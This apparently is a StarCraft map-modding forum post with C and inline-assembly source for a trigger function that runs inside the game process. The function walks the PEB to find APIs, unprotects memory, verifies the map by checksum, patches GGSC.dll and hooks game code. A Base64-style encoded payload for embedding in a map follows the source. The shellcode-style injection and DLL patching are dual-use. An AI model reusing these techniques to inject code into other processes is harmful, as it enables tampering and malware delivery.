20号五合一 5.16版本跨系统 - 中国星际RPG联盟

#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ole32.lib")
#pragma comment(lib,"dxguid.lib")
#include "dmusici.h"
#include "windows.h"
#define DMUS_SEG_REPEAT_INFINITE 0xFFFFFFFF
#define PINT int *
#define FASTCALL __fastcall
#pragma pack(1)
typedef struct
{
DWORD Unused0;
DWORD Text;//1
DWORD Code;//2
DWORD Unused2;//
DWORD Address;
DWORD Value;
USHORT Operator;
} *ActionParams;
typedef void *HANDLE;
BOOL FASTCALL Comment(ActionParams params)
{//V4
HMODULE t;
HANDLE mpq,file,file2;
char *buffer;
DWORD siz,siz2;
char *path;
BOOL (WINAPI*sc_VirtualProtect)(DWORD, DWORD, DWORD, DWORD *);
BOOL (WINAPI*sc_ReadProcessMemory)( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesRead );
BOOL (WINAPI*sc_WriteProcessMemory)( HANDLE hProcess, LPVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesWritten );
DWORD oldProtect;
_asm{
call $+5+15;//13是下面的_EMIT 指令的数量，也就是包括\0在内的字符串长度
_EMIT 'V';//这里写入API函数的名字。
_EMIT 'i'
_EMIT 'r'
_EMIT 't'
_EMIT 'u'
_EMIT 'a'
_EMIT 'l'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 't'
_EMIT 'e'
_EMIT 'c'
_EMIT 't'
_EMIT '\0';//空结束符是必不可少的。
mov eax,fs:30h;
mov eax,[eax+0Ch];
mov esi,[eax+1Ch];
lodsd;
push [eax+8];
call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量，否则会编译出错。
mov sc_VirtualProtect,eax;
call $+5+19;//13是下面的_EMIT 指令的数量，也就是包括\0在内的字符串长度
_EMIT 'W';//这里写入API函数的名字。
_EMIT 'r'
_EMIT 'i'
_EMIT 't'
_EMIT 'e'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 'c'
_EMIT 'e'
_EMIT 's'
_EMIT 's'
_EMIT 'M'
_EMIT 'e'
_EMIT 'm'
_EMIT 'o'
_EMIT 'r'
_EMIT 'y'
_EMIT '\0';//空结束符是必不可少的。
mov eax,fs:30h;
mov eax,[eax+0Ch];
mov esi,[eax+1Ch];
lodsd;
push [eax+8];
call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量，否则会编译出错。
mov sc_WriteProcessMemory,eax;
call $+5+18;//13是下面的_EMIT 指令的数量，也就是包括\0在内的字符串长度
_EMIT 'R';//这里写入API函数的名字。
_EMIT 'e'
_EMIT 'a'
_EMIT 'd'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 'c'
_EMIT 'e'
_EMIT 's'
_EMIT 's'
_EMIT 'M'
_EMIT 'e'
_EMIT 'm'
_EMIT 'o'
_EMIT 'r'
_EMIT 'y'
_EMIT '\0';//空结束符是必不可少的。
mov eax,fs:30h;
mov eax,[eax+0Ch];
mov esi,[eax+1Ch];
lodsd;
push [eax+8];
call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量，否则会编译出错。
mov sc_ReadProcessMemory,eax;
//解除保护start
lea eax,oldProtect
push eax
push 40h
push 0EC000h
push 401000h
call sc_VirtualProtect
//校验scenario.chk
lea eax,mpq
push eax
push 0
push 0
push 0509364h
_EMIT 0xFF
_EMIT 0x15
_EMIT 0xBC
_EMIT 0xD2
_EMIT 0x4E
_EMIT 0x00//OpenArchive
lea eax,[file]
push eax
push 0
push 4EE0B0h//staredit\\scenario.chk
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x68
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00//OpenFile1Ex
push 0
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x58
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00//GetFilesize
mov siz,eax
add eax,4
push 40h
push 1000h
push eax//500K
push 0
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x2C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00//VirtuaAlloc
mov buffer,eax
push 0
lea ecx,siz
push ecx
push siz
push eax
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00//ReadFile
}
DWORD check = 0;
for(unsigned int i = 0; i < siz; i += 7)
check += (i % 64) * buffer;
path = buffer + siz;
_asm
{
lea ecx,file2
push ecx
push 0
push 04FBD08h
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x68
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00//Openfile2Ex
push 0
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x58
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 //GetFile2size
cmp eax,0
sub eax,4
mov siz2,eax
je crash
lea ecx,oldProtect
push 0
push ecx
push 4
push path
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 //ReadFile2
lea ecx,oldProtect
mov eax, 0064650Ch
mov eax, dword ptr [eax]
inc eax
push 0
push ecx
push siz2
push eax
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 //ReadFile2ex
mov eax,dword ptr [path]
mov eax,dword ptr [eax]
cmp eax,check
je OK
}
crash: return false;
OK:
_asm{
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x60
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 //Close File
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x60
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 //Close File
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0xC0
_EMIT 0xD2
_EMIT 0x4E
_EMIT 0x00 //Close Archive
push 8000h//MEM_RELEASE
push 0
push buffer
call DS:[4ED114h];//VirtualFree
//Ban GGSC
call $+14
_EMIT 'G'
_EMIT 'G'
_EMIT 'S'
_EMIT 'C'
_EMIT '.'
_EMIT 'd'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x5C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00
cmp eax,0
je backup
mov t,eax
}
int aa=(int)t+0x0d95a;
int OB1=0xea839090;
unsigned int OBJ;
(*sc_ReadProcessMemory)((HANDLE)-1,(LPCVOID)aa,&OBJ,4,0);
if(OBJ!=OB1)(*sc_WriteProcessMemory)((HANDLE)-1,(LPVOID)aa,&OB1,4,0);
//Backup
_asm
{
backup:
push 40h
push 1000h
push 20000h//500K
push 0
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x2C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00//VirtuaAlloc
mov EBX,eax//ebx=quitasm
MOV EDI,EBX
MOV ECX,1013Ch
MOV ESI,4F25C0h
REP MOVSB
MOV ECX,0F9Ch
MOV ESI,537510h
REP MOVSB
MOV ECX,9E24h
MOV ESI,587660h
MOV ESI,[ESI]
REP MOVSB
pushad
call $+5
pop eax
add eax,21h;
mov edx,044811ch
sub eax,edx
sub eax,5
mov byte ptr ds: [edx],0e9h
xchg [edx+1],eax;
mov EAX,52DF00h
mov esi,EBX
mov dword ptr [eax],esi
popad
jmp e1;
//QuitAsm
PUSHAD
MOV ECX,1013Ch
MOV ESI,DWORD PTR DS:[52DF00h];
MOV EDI,4F25C0h
REP MOVSB
MOV ECX,0F9Ch
MOV EDI,537510h
REP MOVSB
MOV ECX,9E24h
MOV EDI,587660h
MOV EDI,DWORD PTR DS:[EDI]
REP MOVSB
MOV DWORD PTR DS:[44811Ch],8966c085h
MOV DWORD PTR DS:[448120h],645fb80dh
POPAD
TEST EAX,EAX
MOV WORD PTR DS:[645FB8h],CX
MOV EAX,448125h
JMP EAX
//save rep
//jmp
e1: pushad
mov eax,464FC5h
mov byte ptr[eax],0E9h
inc eax
mov dword ptr[eax],000c908bh
call $+5
pop esi
add esi,16h//var
mov edi,52e055h
mov ecx,300h//var
rep movsb//dump
popad
jmp rep2
//save asm
rep1: pushad
mov ecx,200h
mov esi,012F178h
mov edi,52e400h
rep movsb
mov ecx,200h
mov esi,0509364h
rep movsb
mov ebp,52E034h
call $+5+11;
_EMIT 'm'
_EMIT 's'
_EMIT 'v'
_EMIT 'c'
_EMIT 'r'
_EMIT 't'
_EMIT '.'
_EMIT 'd'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
call DS:[004ED1B0h];//GetModuleHandle
mov ebx,eax;
call $+5+6;
_EMIT 'f'
_EMIT 'o'
_EMIT 'p'
_EMIT 'e'
_EMIT 'n'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp], eax
call $+5+6;
_EMIT 'f'
_EMIT 't'
_EMIT 'e'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+04h], eax
call $+5+6;
_EMIT 'f'
_EMIT 'r'
_EMIT 'e'
_EMIT 'a'
_EMIT 'd'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+08h], eax
call $+5+7;
_EMIT 'f'
_EMIT 'w'
_EMIT 'r'
_EMIT 'i'
_EMIT 't'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+0Ch], eax
call $+5+6;
_EMIT 'f'
_EMIT 's'
_EMIT 'e'
_EMIT 'e'
_EMIT 'k'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+010h], eax
call $+5+7;
_EMIT 'f'
_EMIT 'c'
_EMIT 'l'
_EMIT 'o'
_EMIT 's'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+014h], eax
call $+5+7;
_EMIT 'm'
_EMIT 'a'
_EMIT 'l'
_EMIT 'l'
_EMIT 'o'
_EMIT 'c'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+018h], eax
call $+5+5;
_EMIT 'f'
_EMIT 'r'
_EMIT 'e'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+01Ch], eax
call $+5+3
_EMIT 'r'
_EMIT 'b'
_EMIT '\0'
push 52e400h
call [ebp] // fopen1
add esp,8
mov dword ptr DS:[052e018h],eax //f1
push 2
push 0
push eax
call [ebp+010h] //fseek1
add esp,12
push dword ptr DS:[052e018h]
call [ebp+04h] //ftell1
pop ebx
mov ecx,0200h//calc
xor edx,edx
_EMIT 0xF7
_EMIT 0xF9//idiv eax,ecx
sub ecx,edx//ecx = pad 00 count
mov dword ptr DS:[052e020h],ecx//f1pad
push dword ptr DS:[052e018h]
call [ebp+014h] //fclose
pop ebx
call $+5+3
_EMIT 'r'
_EMIT 'b'
_EMIT '\0'
push 052e600h
call [ebp] // fopen2
add esp,8
mov dword ptr DS:[052e018h],eax //f2
push 2
push 0
push eax//FILE*
call [ebp+010h] //fseek map to end
add esp,12
push dword ptr DS:[052e018h]
call [ebp+04h] //ftell map f2
pop ebx
mov dword ptr DS:[052e01Ch],eax//f4是f2size
add eax,dword ptr DS:[052e020h]
push eax
call [ebp+018h] //malloc
pop ebx
mov edi,eax//!!!edi是buffer
mov dword ptr DS:[052e024h],edi
push 0
push 0
push dword ptr DS:[052e018h]
call [ebp+010h] //fseek map to top1
add esp,12
mov ecx,dword ptr DS:[052e020h]//pad size
add edi,ecx
push dword ptr DS:[052e018h]//FILE*
push 1
push dword ptr DS:[052e01Ch]//size
push edi//buffer
call [ebp+08h] //fread1
add esp,16
push dword ptr DS:[052e018h]
call [ebp+014h] //fclose1
pop ebx
call $+5+3
_EMIT 'a'
_EMIT 'b'
_EMIT '\0'
push 52e400h
call [ebp] // fopen1
add esp,8
mov dword ptr DS:[052e018h],eax
mov ebx,dword ptr DS:[052e01Ch]//f2size
add ebx,dword ptr DS:[052e020h] //+f1size
push eax//FILE*
push 1
push ebx
push dword ptr DS:[052e024h]
call [ebp+0Ch] //fwrite3
add esp,16
push dword ptr DS:[052e018h]
call [ebp+014h] //fclose1
pop ebx
push dword ptr DS:[052e024h]
call [ebp+01Ch] //free1
pop ebx
mov eax,0464FC5h
mov byte ptr[eax],085h
inc eax
mov dword ptr[eax],0B91A74C0h
popad
mov ecx,00464FC5h
jmp ecx
}
rep2: return true;
}
void AfterFunction(){}
LPCSTR Base64Enc(int size = 0)
{
if (size <= 0)
size = PtrToLong((PBYTE)AfterFunction - (PBYTE)Comment);
PBYTE text = (PBYTE)Comment;
PBYTE out = new BYTE[(size - 1) * 4 / 3 + 1],buf = out;
int buflen = 0;
while(size>0)
{
*buf++ = ((text[0] >> 2 ) & 0x3f) + 0x30;
*buf++ = (((text[0] & 3) << 4) | (text[1] >> 4)) + 0x30;
*buf++ = (((text[1] & 0xF) << 2) | (text[2] >> 6)) + 0x30;
*buf++ = (text[2] & 0x3F) + 0x30;
text +=3;
size -=3;
buflen +=4;
}
*buf = 0;
return (LPCSTR)out;
}
int main(int argc, CHAR* argv[])
{
FILE *f1=fopen("d:\\desktop\\comment20.txt","wb");
fprintf(f1,"Comment(\"%s\", 0, 0, 20, 0, 1);\nComment(\"\", 0, 0, 0, 0, 20);",Base64Enc());
fclose(f1);
int i;
}
Comment("EH_\Pna8DeIGRDfhj0l0001FJG9dMF5\D79_M6ESM01TXC00002;@0b;L1b]og08?_lEH=5>08U5l>PC0000Eg9YM6E@LVmSIG=cCFE]Kg9i06BQ<00008]038]`7:goL0PnoaEPdDh0RDG\j180001BIF5TD79_HfEcLdeUKFmbN@1TXC00002;@0b;L1b]og08?_lEH=5>08U5i8e5m51Z@6P0`0h0J00@@03oEO2=AMA@JP1Z06QTTe00oaFldTh0SDGXD6X0J;3PCP3oMMCo5FSCCP1Z0?mej?lEF==>08U5`8?016Y0J00@001@JP3o5BcACP29ALQZ08e=`57oML1@ogGXoaEDddh0PfGh08=U_03[2H]5_8?01hU5_8]5_3]5`7<NRdFl<m9Z@5WglH]5b0=5_0nn00n_d0=En8UEn>_ARdG80dG0RDG<SDgHDFX0J0RmC`3oMMCo5FSCCP1Z0?mef?lEF==>08?h08?X18U5g7@iSDgdJP1AJPCoMLcoMMSo5ECCCP2=COBh36ET08\0@6X0DOmeg53oMMSo5ECCCP2;ALb;03]5n7@7<l3YT@<00?mej?lEH==>0?mef?lEH==>0?mee?lE`=9>06P0P000JP3oMLPnoaDDdDh0j0T00017Ae=3;VA\K03o5EcACP23n01d?HU5a8]5a0EJf@00RDGladG@T923jVX0JPB=AN1@ogGlJ_ooENB;AN0kAM1d46X0JPB=AM1@ogGlJ_ooENaZ@6P04000J0000P1Z0?lE;=5>08_HRo^i?0410;k09Dl0ljBiW0l00;h@ME<0ljBi99h00;iPMUP0RcKcY63X000005R3`26j785402_2PnP5?\H2jHM20KP0ge80Ro>9<67[Ef2i?04103j;=@3ODP2o`2E?0?>T^I`?002o47EC0?>T^BBN002oH7IH03j;?o>T?\L5785408G0IXTna`DPPD@03KQOI665`6HnR@fhGf@0^2F1A03oh62haDm60<H0jD3708^@303X000005j3aQJoEN1B0;T00`00ljAQjBD2001P^@02002nN?4B0;l0i580ljBi00800;iTTe00ljBm=>1B0>P;0000KG=fHg9d;VA\K00noaF`dDh0RmSX1P0006I_L6E^05<noaEPdDh0RDD0j0H0001VM6E\K01C?_lEH=5>08U51>P60000IW9UHF@0Dcko5F3ACP29A@SX1`0006IgLVUdI@1C?_lEH=5>08U53>P60000IW=UIF\0Dcko5F3ACP29AA3X1`0006ISK6mcI@1C?_lEH=5>08U55>P70000KF5\K6mS05<noaEPdDh0RDDHj0D0001VLVEU05<noaEPdDh0RDDLj0<0001bHP1X0>AB0?mE08?423jS6>1B06X2JP1@oeD@Pl@<?_le6>1B0?mE15^i008003?BmoT[bSj93B3PDP0nocDHh580oeDDFnP30000LV80J03VDP3oE@23a0PnXaSPDP1Z0VX0D?mE48?433ko=ASPDP3oE@AK?Z<Lh580?P<58>1B053oEAQKRoPnRCdTh580JP1Z03ko=ASPDP3oEA23a0`nR`dPh5800oTnocDHh580JP4nocDLh580EomE28?443ko=ASPDP3oEAAKj0<0001QHP1X0>AB0?mE08?423jS6>1B03j;7AcPDP0n0adPh580D6X1Dcko=BCPDP3oE@b3a10nocDHh580oeDDFcko=BCPDP3oEAaK^<E?AP3608E0a`30M1ZiHKW5CdH0on4c`41OGU_9`l=A", 0, 0, 20, 0, 1);
Comment("", 0, 0, 0, 0, 20);

复制代码